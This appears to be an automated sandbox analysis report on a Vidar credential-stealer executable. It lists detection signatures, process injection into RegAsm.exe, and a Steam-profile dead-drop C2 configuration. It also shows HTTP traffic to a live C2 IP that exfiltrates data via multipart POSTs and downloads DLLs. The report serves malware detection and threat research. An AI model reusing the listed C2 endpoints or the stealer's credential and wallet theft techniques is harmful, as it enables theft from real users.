Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1428826
MD5: b841d5f5e8102ee6ac56d565fbb58879
SHA1: 972f4ba09920b0512769f9eb1923da2d8b0b9470
SHA256: e3d540df89c42080e0d44ae13d7687f5ec5dd178128cb9831eefddc742f2cf3e
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B841D5F5E8102EE6AC56D565FBB58879)
    • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 7508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7532 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 7448 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: RegAsm.exe PID: 7532 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.3eeac0.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.3eeac0.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
5.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
5.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.3c0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

No Sigma rule has matched
No Snort rule has matched

                        AV Detection

                        Source: file.exe | Avira: detected
                        Source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
                        Source: file.exe | Joe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00411720 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,5_2_00411720
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree,5_2_00406FD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,5_2_00409230
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,5_2_00406F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,5_2_6C806C80
                        Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknown | HTTPS traffic detected: 184.30.122.179:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.dr
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: softokn3.pdb source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D90D1 FindFirstFileExW,0_2_003D90D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,5_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,5_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,5_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,5_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                        Networking

                        Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199673019888
                        Source: global traffic | HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: Joe Sandbox View | IP Address: 184.30.122.179 184.30.122.179
                        Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHII | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 8381 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /sqln.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 4677 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 1529 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 1145 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKE | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 453 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 113433 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKF | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: unknown | TCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00404500 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_00404500
                        Source: unknown | DNS traffic detected: queries for: steamcommunity.com
                        Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHII | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 37.27.87.155 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071759889.0000000019E7D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://37.27.87.155
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/%
                        Source: RegAsm.exe, 00000005.00000002.2066860045.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/%-
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/:
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/B
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/C
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/J
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/N
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/Q
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/ata
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/et
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dllr
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000016A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/ig
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/mozglue.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/mozglue.dll8
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/msvcp140.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/nes
                        Source: RegAsm.exe, 00000005.00000002.2066860045.0000000001669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/nss3.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/softokn3.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.000000000155A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/softokn3.dllX
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/sqln.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/vcruntime140.dll
                        Source: RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/vcruntime140.dll&
                        Source: RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.1550e3a617e50bnt-Disposition:
                        Source: RegAsm.exe, 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155AFBKF
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155AKEHI
                        Source: GDHIEHJE.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199673019888[1].htm.5.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: GDHIEHJE.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: GDHIEHJE.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: GDHIEHJE.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
